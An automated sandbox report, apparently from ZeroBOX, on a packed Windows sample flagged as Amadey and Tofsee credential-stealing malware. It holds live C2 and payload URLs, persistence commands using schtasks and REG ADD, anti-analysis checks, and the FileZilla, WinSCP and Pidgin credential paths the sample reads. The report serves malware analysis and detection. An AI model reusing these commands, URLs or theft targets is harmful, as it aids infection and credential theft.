Summary | ZeroBOX

asd.exe

PWS JPEG Format PE32 PE File DLL
Category Machine Started Completed
FILE s1_win7_x6402 June 18, 2021, 9:46 a.m. June 18, 2021, 9:55 a.m.
Size 2.1MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 8b7f7f3857dd6194924c982d97fd13ce
SHA256 ab749e7cd59a78a07a9b31ecaac7ada27da490d97bbe62756c19baa96c64be07
CRC32 16DBFA64
ssdeep 49152:9EN7Iq5C7hdw6iOBTPnJztIyUKSgMAJjY9URpHAfrWRfKcyN:C7ybNmy6gMA8UzAfrWKl
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

IP Address Status Action
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
193.164.16.141 Active Moloch
217.107.34.191 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49822 -> 217.107.34.191:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49823 -> 217.107.34.191:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 217.107.34.191:443 -> 192.168.56.102:49824 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.102:49826 -> 217.107.34.191:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 217.107.34.191:443 -> 192.168.56.102:49828 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.102:49818 -> 217.107.34.191:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49831 -> 217.107.34.191:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 217.107.34.191:443 -> 192.168.56.102:49832 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 217.107.34.191:443 -> 192.168.56.102:49819 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.102:49813 -> 193.164.16.141:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.102:49816 -> 217.107.34.191:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49834 -> 217.107.34.191:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49835 -> 217.107.34.191:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 217.107.34.191:443 -> 192.168.56.102:49836 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.102:49813 -> 193.164.16.141:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.102:49830 -> 217.107.34.191:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49827 -> 217.107.34.191:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 193.164.16.141:80 -> 192.168.56.102:49814 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 193.164.16.141:80 -> 192.168.56.102:49814 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "drbux.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section
section .imports
section .themida
section .boot
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
asd+0x304cc5 @ 0xf84cc5
asd+0x2e8893 @ 0xf68893

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc000008e
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 3734972
registers.edi: 13398016
registers.eax: 3734972
registers.ebp: 3735052
registers.edx: 2130566132
registers.ebx: 0
registers.esi: 2000778283
registers.ecx: 1877606400
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed e9 dc 59 03 00 54 95 fd 9e 46 7d 00 00 79 00
exception.symbol: asd+0x2e46bb
exception.instruction: in eax, dx
exception.module: asd.exe
exception.exception_code: 0xc0000096
exception.offset: 3032763
exception.address: 0xf646bb
registers.esp: 3735092
registers.edi: 6762965
registers.eax: 1750617430
registers.ebp: 13398016
registers.edx: 6772822
registers.ebx: 0
registers.esi: 13
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed e9 85 e1 ff ff c3 e9 9e e1 ff ff 3f 05 05 87
exception.symbol: asd+0x31b875
exception.instruction: in eax, dx
exception.module: asd.exe
exception.exception_code: 0xc0000096
exception.offset: 3258485
exception.address: 0xf9b875
registers.esp: 3735092
registers.edi: 6762965
registers.eax: 1447909480
registers.ebp: 13398016
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 13
registers.ecx: 10
1 0 0

__exception__

stacktrace:
drbux+0x304cc5 @ 0x504cc5
drbux+0x2e8893 @ 0x4e8893

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc000008e
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 9763956
registers.edi: 2387968
registers.eax: 9763956
registers.ebp: 9764036
registers.edx: 2130566132
registers.ebx: 0
registers.esi: 2000778283
registers.ecx: 2518155264
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed e9 dc 59 03 00 54 95 fd 9e 46 7d 00 00 79 00
exception.symbol: drbux+0x2e46bb
exception.instruction: in eax, dx
exception.module: drbux.exe
exception.exception_code: 0xc0000096
exception.offset: 3032763
exception.address: 0x4e46bb
registers.esp: 9764076
registers.edi: 14234178
registers.eax: 1750617430
registers.ebp: 2387968
registers.edx: 14243926
registers.ebx: 0
registers.esi: 13
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed e9 85 e1 ff ff c3 e9 9e e1 ff ff 3f 05 05 87
exception.symbol: drbux+0x31b875
exception.instruction: in eax, dx
exception.module: drbux.exe
exception.exception_code: 0xc0000096
exception.offset: 3258485
exception.address: 0x51b875
registers.esp: 9764076
registers.edi: 14234178
registers.eax: 1447909480
registers.ebp: 2387968
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 13
registers.ecx: 10
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://x-vpn.ug/hfV3vDtt/index.php
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://x-vpn.ug/hfV3vDtt/index.php?scr=1
suspicious_features GET method with no useragent header suspicious_request GET http://f.hiterima.ru/87435972.exe
suspicious_features GET method with no useragent header suspicious_request GET http://x-vpn.ug/hfV3vDtt/plugins/cred.dll
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://x-vpn.ug//hfV3vDtt/index.php
request POST http://x-vpn.ug/hfV3vDtt/index.php
request POST http://x-vpn.ug/hfV3vDtt/index.php?scr=1
request GET http://f.hiterima.ru/87435972.exe
request GET http://x-vpn.ug/hfV3vDtt/plugins/cred.dll
request POST http://x-vpn.ug//hfV3vDtt/index.php
request POST http://x-vpn.ug/hfV3vDtt/index.php
request POST http://x-vpn.ug/hfV3vDtt/index.php?scr=1
request POST http://x-vpn.ug//hfV3vDtt/index.php
domain f.hiterima.ru description Russian Federation domain TLD
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7743f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x773b0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00caf000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ca8000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ca8000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 36864
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ca8000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 7768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7743f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 7768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x773b0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 7768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0022f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 7768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00228000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 7768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00228000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 7768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 36864
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00228000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 7768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73772000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76891000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x765b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73e80000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73771000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74471000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72da4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73772000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73e01000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71f61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x66fe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x66fc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73321000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73e21000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x66fb1000
process_handle: 0xffffffff
1 0 0
description drbux.exe tried to sleep 479 seconds, actually delayed analysis time by 479 seconds
file C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe
file C:\ProgramData\ca82a716069a53\cred.dll
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\8a643770bf\
file C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe
file C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\8a643770bf\
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\ProgramData\ca82a716069a53\cred.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ¡ –X€¤°@@ð@à& ˜CODE˜”– `DATA´°š@ÀBSSÝ Ð®À.idata&à®@À.edata@ð¾@P.reloc˜À@P.rsrc Þ@P@ò@P@ StringX@X@x;@„;@ˆ;@Œ;@€;@ø8@9@P9@TObjectd@TObjectX@System„@ IInterfaceÀFSystemÿÿ̃D$øéAJƒD$øé_JƒD$øéiJÌ̱@»@Å@ÀFÑ@@L@Ý@L@ @x;@ÐZ@ÜZ@Œ;@€;@ìZ@9@P9@TInterfacedObject‹Àÿ%¨áA‹Àÿ%¤áA‹Àÿ% áA‹Àÿ%œáA‹Àÿ%˜áA‹Àÿ%”áA‹Àÿ%áA‹Àÿ%ŒáA‹Àÿ%ˆáA‹Àÿ%„áA‹Àÿ%€áA‹Àÿ%|áA‹Àÿ%¼áA‹Àÿ%xáA‹Àÿ%¸áA‹Àÿ%táA‹Àÿ%páA‹Àÿ%láA‹Àÿ%háA‹Àÿ%dáA‹Àÿ%`áA‹Àÿ%\áA‹Àÿ%XáA‹Àÿ%TáA‹Àÿ%PáA‹Àÿ%LáA‹Àÿ%HáA‹Àÿ%´áA‹Àÿ%DáA‹Àÿ%@áA‹Àÿ%<áA‹Àÿ%ÌáA‹Àÿ%ÈáA‹Àÿ%ÄáA‹Àÿ%8áA‹Àÿ%4áA‹Àÿ%ÜáA‹Àÿ%ØáA‹Àÿ%ÔáA‹Àÿ%0áA‹Àÿ%,áA‹Àÿ%(áA‹Àÿ%$áA‹ÀSƒÄ¼» TèYÿÿÿöD$,t·\$0‹ÃƒÄD[ËÀÿ% áA‹Àÿ%áA‹Àÿ%áA‹Àÿ%áA‹Àÿ%áA‹Àÿ% áA‹Àÿ%áA‹Àÿ%áA‹ÀSƒÄô»àÕAƒ;uYhDjè¦ÿÿÿ‰D$ƒ|$u3À‰$ëP‹D$‹ÜÕA‰‹D$£ÜÕA3À‹ÐҋL$TщT$‹T$‹ ‰ ‹T$‰@ƒødu܋‰D$‹D$‹‰‹D$‰$‹$ƒÄ [ɉ@ËÀSVƒÄø‹ò‹Øèfÿÿÿ‰D$ƒ|$u3Àë:‹‹T$‰B‹F‹T$‰B ‹‰$‹D$‹$‰‹D$‰X‹$‹T$‰P‹D$‰°YZ^[ÃÄø‹P‰$‹‰T$‹$‹L$‰ ‹T$‹ $‰J‹àÕA‰£àÕAYZËÀSVWUƒÄø‹Ù‹ð‹ü‹‰‹‰‹B‰C‹‹‰D$‹‹R‹Ê‹/M ‹;Èu‹èÿÿÿ‹‹@‰‹‹@ CëC;Ðu‹èqÿÿÿ‹‹@ C‹D$‰;7u®‹Ó‹Æèúþÿÿ„Àu3À‰YZ]_^[Í@SVWUƒÄð‰$‹ô‹‰D$ ‹ ‹‹@;È‚†‹Ø‹>_ ‹ùz;ßrv;Èu!‹B‹A‹B‹)B ‹ƒx uV‹èðþÿÿëM‹Ø‹>_ ‹ùz;ßu ‹B‹)B ë3‹Z‰\$‹>‹‹.} +û‰|$+ȋ‰H T$‹èMþÿÿ„Àu3Àë°ë‹‹‰‹;D$ …Yÿÿÿ3ÀƒÄ]_^[ÐSVW‹Ú‹ðþ}¾ë Æÿÿæÿÿ‰sjh Vjè4ýÿÿ‹ø‰;…ÿt#‹Ó¸äÕAèÜýÿÿ„Àuh€j‹Pèýÿÿ3À‰_^[ÐSVWU‹Ù‹ò‹èÇCjh hUèáüÿÿ‹ø‰;…ÿuÆÿÿæÿÿ‰sjh VUè¼üÿÿ‰ƒ;t#‹Ó¸äÕAèeýÿÿ„Àuh€j‹Pèžüÿÿ3À‰]_^[ÐSVWUƒÄè‹ù‹ôÇD$ÿÿÿÿ3ɉL$ ‰D$T$‰T$¡äÕA‰ëk‹‹‰D$‹‹X;\$rR‹Ã‹B ;D$wE;\$s‰\$‹‹h‹h ;l$ v‰l$ h€j‹‹@Pèüÿÿ…Àu ÇÀÕA‹èýÿÿ‹D$‰¸äÕA;uŒ3À‰ƒ|$ t‹D$‰‹D$ +D$‰GƒÄ]_^[ËÀSVWUƒÄè‹Ù‰$t$|$l$ ‹Ð‹Êáðÿÿ‰L$$Âÿâðÿÿ‰T$‹D$‰‹D$+D$‰C¡äÕA‰ë[‹‹@‰‹‹@ ‰E‹;D$s‹D$‰‹E;D$v‹D$‰E‹;Esjh‹E+P‹Pè&ûÿÿ…Àu3À‰ë‹‹‰¸äÕA;uœƒÄ]_^[ÐSVWUƒÄè‰$t$|$\$ ‹Ð‹êÅÿåðÿÿ‰l$$âðÿÿ‰T$‹D$‰‹D$+D$‰A¡äÕA‰ëX‹‹@‰‹‹@ ‰‹;D$s‹D$‰‹;D$v‹D$‰‹;s h@‹+P‹Pèwúÿÿ…Àu ÇÀÕA‹‹‰¸äÕA;uŸƒÄ]_^[ËÀSVWUƒÄô‹Ú‹ð‹ü½ôÕAÆÿ?æÀÿÿ‹E‰ëA‹;p 4‹Ë‹‹@‹ÖèJþÿÿƒ;t_‹C‹B‹C‹)B ‹ƒx uG‹èûÿÿë>‹‹‰;/u»‹Ó‹Æèmüÿÿƒ;t&L$‹Ó‹Åèûÿÿƒ|$u’L$‹S‹è"ýÿÿ3À‰ƒÄ ]_^[ËÀSVWUƒÄè‰ $‹ú‹Øt$½ôÕAÇÿ?çÀÿÿ‹E‰ë‹‹‰;.t‹;Xuï‹;Xu_‹;x Žœ‹‹×+P ‹‹@‹A L$è5üÿÿƒ|$t3L$T$‹Åèoúÿÿƒ|$uŸL$‹T$ ‹D$èüÿÿ‹$3҉隍L$‹×‹Ãèîûÿÿƒ|$t4L$T$‹Åè(úÿÿƒ|$…TÿÿÿL$‹T$ ‹D$è4üÿÿ‹$3҉ëR‹‹h;ÝuB‹;x ;‹ $‹Å‹×è×üÿÿ‹$ƒ8t.‹$‹@‹B‹$‹@‹)B ‹ƒx u‹è†ùÿÿë‹$3҉ƒÄ]_^[ÐSƒÄè‹Ùˆÿ?áÀÿÿ‰ $ЁâÀÿÿ‰T$‹D$;$v_‹Ë‹T$+$‹$èýÿÿL$‹Ó¸ôÕAè]ùÿÿ‹\$…ÛtL$‹T$ ‹Ãènûÿÿ‹D$‰D$‹D$‰D$ ƒ|$tT$¸ôÕAè©ùÿÿë3À‰ƒÄ[ËÀU‹ìQ3ÒUhì@dÿ2d‰"hÄÕAè¼÷ÿÿ€=EÐAt hÄÕAè±÷ÿÿ¸äÕAèCøÿÿ¸ôÕAè9øÿÿ¸ ÖAè/øÿÿhøjè_÷ÿÿ£ÖAƒ=ÖAt@¸‹ÖA3ɉL‚ô@=uìÇEüÖA‹Eü‹Uü‰P‹Eü‹Uü‰‹Eü£ÖAƼÕA3ÀZYYd‰hó@€=EÐAt hÄÕAè!÷ÿÿÃéW"ëå ¼ÕAY]ÐU‹ìƒ
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00012595', u'virtual_address': u'0x00001000', u'entropy': 7.976451111720309, u'name': u' ', u'virtual_size': u'0x00026076'} entropy 7.97645111172 description A section with a high entropy has been found
section {u'size_of_data': u'0x00003706', u'virtual_address': u'0x00028000', u'entropy': 7.9360022032700295, u'name': u' ', u'virtual_size': u'0x000082a4'} entropy 7.93600220327 description A section with a high entropy has been found
section {u'size_of_data': u'0x000001fa', u'virtual_address': u'0x00031000', u'entropy': 7.5728331331089045, u'name': u' ', u'virtual_size': u'0x00004544'} entropy 7.57283313311 description A section with a high entropy has been found
section {u'size_of_data': u'0x000010b6', u'virtual_address': u'0x00036000', u'entropy': 7.8980078945106795, u'name': u' ', u'virtual_size': u'0x00006325'} entropy 7.89800789451 description A section with a high entropy has been found
section {u'size_of_data': u'0x00001983', u'virtual_address': u'0x0003d000', u'entropy': 7.912903028514336, u'name': u' ', u'virtual_size': u'0x00001cdc'} entropy 7.91290302851 description A section with a high entropy has been found
section {u'size_of_data': u'0x001efcba', u'virtual_address': u'0x003cb000', u'entropy': 7.950136186729805, u'name': u'.boot', u'virtual_size': u'0x001efe00'} entropy 7.95013618673 description A section with a high entropy has been found
entropy 0.987896811418 description Overall entropy of this PE file is high
cmdline cmd /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\8a643770bf\
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe" /F
cmdline REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\8a643770bf\
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\8a643770bf\
host 172.217.25.14
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: File Monitor - Sysinternals: www.sysinternals.com
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: Process Monitor - Sysinternals: www.sysinternals.com
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: Registry Monitor - Sysinternals: www.sysinternals.com
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: File Monitor - Sysinternals: www.sysinternals.com
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: Process Monitor - Sysinternals: www.sysinternals.com
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: Registry Monitor - Sysinternals: www.sysinternals.com
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe" /F
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
